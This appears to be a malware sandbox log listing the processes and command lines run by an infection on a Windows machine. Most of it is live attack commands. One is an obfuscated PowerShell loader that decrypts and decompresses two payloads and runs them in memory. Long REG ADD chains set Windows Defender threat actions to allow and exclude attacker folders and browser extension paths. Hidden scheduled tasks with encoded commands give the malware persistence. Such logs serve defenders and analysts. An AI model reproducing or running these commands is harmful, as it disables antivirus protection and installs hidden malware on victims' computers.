"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vYb4bUA8Zv1kMxYvRP0sAIjxZQ1BITEGl+5o22oRccc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7mk7YscC2aINMd/eWv3Jag=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xocfa=New-Object System.IO.MemoryStream(,$param_var); $bOZJm=New-Object System.IO.MemoryStream; $ufGxK=New-Object System.IO.Compression.GZipStream($Xocfa, [IO.Compression.CompressionMode]::Decompress); $ufGxK.CopyTo($bOZJm); $ufGxK.Dispose(); $Xocfa.Dispose(); $bOZJm.Dispose(); $bOZJm.ToArray();}function execute_function($param_var,$param2_var){ $yYjBH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ftLJu=$yYjBH.EntryPoint; $ftLJu.Invoke($null, $param2_var);}$hWrPo = 'C:\Users\Admin\AppData\Local\Temp\dbuslf.bat';$host.UI.RawUI.WindowTitle = $hWrPo;$pJBjW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hWrPo).Split([Environment]::NewLine);foreach ($TrzXq in $pJBjW) { if ($TrzXq.StartsWith('qwvMZizsyLxauvnWQoBQ')) { $drGJM=$TrzXq.Substring(20); break; }}$payloads_var=[string[]]$drGJM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\dbuslf')

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXFglHWZD" /SC once /ST 12:00:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gXFglHWZD"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4580 /prefetch:8

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gXFglHWZD"

C:\Windows\SysWOW64\schtasks.exe

